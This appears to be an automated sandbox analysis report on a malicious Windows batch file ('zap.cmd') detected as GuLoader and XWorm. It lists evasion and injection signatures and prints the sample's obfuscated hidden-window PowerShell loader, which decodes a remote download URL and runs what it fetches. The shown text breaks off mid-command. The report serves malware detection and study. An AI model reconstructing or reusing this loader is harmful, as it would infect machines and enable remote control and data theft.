Windows
Analysis Report
zap.cmd
Overview
General Information
Detection
GuLoader, XWorm
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 6480 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\zap.c md" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 1396 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 5092 cmdline:
powershell .exe -wind owstyle hi dden "$Sul phuric = 1 ;$Plethoro us='Sub';$ Plethorous +='strin'; $Plethorou s+='g';Fun ction hdre de($Blaast akkens){$P reflood=$B laastakken s.Length-$ Sulphuric; For($fstni ngsvrkers= 5;$fstning svrkers -l t $Prefloo d;$fstning svrkers+=6 ){$Handels standsfore nings251+= $Blaastakk ens.$Pleth orous.Invo ke( $fstni ngsvrkers, $Sulphuri c);}$Hande lsstandsfo renings251 ;}function Smrkers($ Scooch){& ($Tragulo idea) ($Sc ooch);}$St ikprop=hdr ede 'Hjlpe MNvninoKli p zBrothi Uds lDagsb l f,rmaKb. va/Nices5W oodb.Monas 0 R.fl Ac. om(pladeWS uffoi Anno n,loofddum ,eo Arbew KilosCarpo ronNFemi TKingp Kl oak1Lfted0 Misst.Mono p0Danto;St e i Alg,rW O lsniLyks anMedio6Sk att4Anlgs; Unomn Over hx Prer6 V arm4Nivea; Pi,d Pol trDegrevPh th,:Overj1 brai.2 Ava r1.ands.Fr iti0Bedr.) Hore Skra aG TutmeSi ngacReseik G.ammoMrk s/F.gtf2T. len0Zenuw1 Smmom0Pra. k0 ,ons1gl del0 etur1 Sw pl Virg iFMateriTr aa,r.rikte Sk lafTitr aoEriocx p re./No,il1 Dilet2Tjre k1.esgs.L, sin0 Wool ';$Tudkopp ernes=hdre de 'MoneyU FranksPrec ieDa omrBa nal- MajoA Lactg Ina peUndern i gnt eca '; $Loddendes =hdrede 'b ela,hSambe tBackhtSpa ttpFornusF arve: Exed /Agerj/Unt anwhemi,wA ntemw dapi .Preles,om iteFo,brnS crold Aswi sSin,lpMod byaS,mbicF ytteMod.v . Didecthu ,do RivamS t,tu/Solda p dybhrhem ogo rbe/Un chrdGkkerl De,t/Prea fj.ostbjTh rif4Stinku Tauriw A,s t4 Dyre '; $Gainyield =hdrede 'P ino,> orma ';$Tragul oidea=hdre de ' Leeui PhiloeCoty lxBront '; $Sogneprst ='Khedivia h';$Indlae s = hdrede ' Ar.eeU derc Parah dir yo Eks s Geogl% F rdia Lovtp DisorpFrem tdSynf,a U ropt Kn.sa iara% I d p\te,esI M ohanFolk.n FarmeuSens imNeur,eTr ster Nazaa Semi b Bar nlMutone S wee.T,oppS AandnMacr .oFanta ,n der&Im.od& B adm Uros teFr,ntcAc leihA.goso Elvte Seri etSe in '; Smrkers (h drede 'His to$Whispg Taknl Unr, o UntrbFor bra WorklA bsal: Micr BGasrroDen tagBi.enlR gerlr Fort dEsslie Pe rssSatch=D .gdr(Sylfe cBaha,mSka mbdTwadd ele/Aft,ec ,ugh Mis, m$SerosI U ntenEntomd TrforlTend eadeporeDi ktasSnupp) spoer ');S mrkers (hd rede ' Val u$daimigNo nr l.egago ,entebFe.i caMo ndlsv vef:ForveS Ov rto Stn dmPrdikmSi wase offlr Bl sdfNive auMislagBa ronlG.evde AnatemN.gh to.ugledVe nlieG wkil PopullZy,o dekmninr,k abesFin.a= Forst$N.tr iLTagaso B io.d Eos.d Ag iceTran sn.ankidO gaveOutw s Fanga.Ital isDirtbpMe litlEderni forlst Sub s(Amatr$Su lfoGBrndsa OrgaiPet onUnlabySe lvbiMa.ise MayollAlpe td Dagd) E ner ');$Lo ddendes=$S ommerfugle modellers[ 0];$Lngere varig= (hd rede 'Iron i$AfstegAn lgklOutseo Dadleb Iso taindfalMa ste:.krueP TrkkyDelb erForniasj oven.noffo Over,iKata ldBipro= S ug N Minue TilenwFili b- Ank,OUn manb Acluj bogleeFld, sc Reg,t D